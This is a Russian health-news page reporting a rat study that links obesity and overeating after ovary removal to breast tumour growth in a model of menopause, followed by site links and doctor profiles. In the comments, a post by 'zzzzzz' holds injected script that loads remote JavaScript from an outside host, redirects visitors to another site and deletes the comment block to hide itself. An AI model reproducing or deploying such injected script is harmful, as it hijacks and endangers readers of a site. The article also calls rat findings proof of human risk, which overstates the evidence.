Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Переедание после 50 приво...  >>  Переедание после 50 приводит к раку
 
Обратная связь
 

Переедание после 50 приводит к раку

Размер шрифта
06 марта 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые обнаружили, что женщины в постменопаузе, страдающие ожирением, имеют повышенный риск развития рака молочной железы.

переедание приводит к раку груди

«Во время менопаузы женщины часто набирают вес, поскольку потребляют больше калорий, чем нужно их организму. Поскольку мы не можем проводить подобные исследования при участии людей, мы провели исследования на крысах. Для того чтобы смоделировать менопаузу, мы удалили у крыс яичники», – рассказывает один из авторов исследования Пол Маклин из Колорадского университета.

В эксперименте на крысах ученые доказали, что ожирение и переедание после удаления яичников способствуют агрессивному росту опухоли и прогрессированию заболевания. После удаления яичников крысы не могли переработать избыточное количество глюкозы и жиров, поступающих с пищей. У крыс без лишнего веса избыток глюкозы и жиров откладывался в печени, жировой ткани, мышцах и молочных железах. Однако у крыс с ожирением весь избыток глюкозы поступал в молочные железы, что приводило к значительному росту опухоли.

«Таким образом, женщины должны задуматься о борьбе с ожирением еще до наступления менопаузы. Необходимо ограничивать себя в еде и увеличить физическую активность», – советует Маклин.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как добавить 20 лет к жизни   Вы живете с неудачником? 6 причин, почему вы не можете уйти от него   Три повода сохранить брак   Мужчины против женщин. Кто лучше?  
01 марта 2013Почему пожилые люди так часто становятся жертвами мошенников 12 ноября 2012Старческие болезни больше не страшны
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 

Слайдшоу

1
Почему от пожилых так пахнет
Вы проживете до 100 лет, если ответите «да» на эти вопросы
Супереда против старения

Тесты

1
Что вы знаете о груди?
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.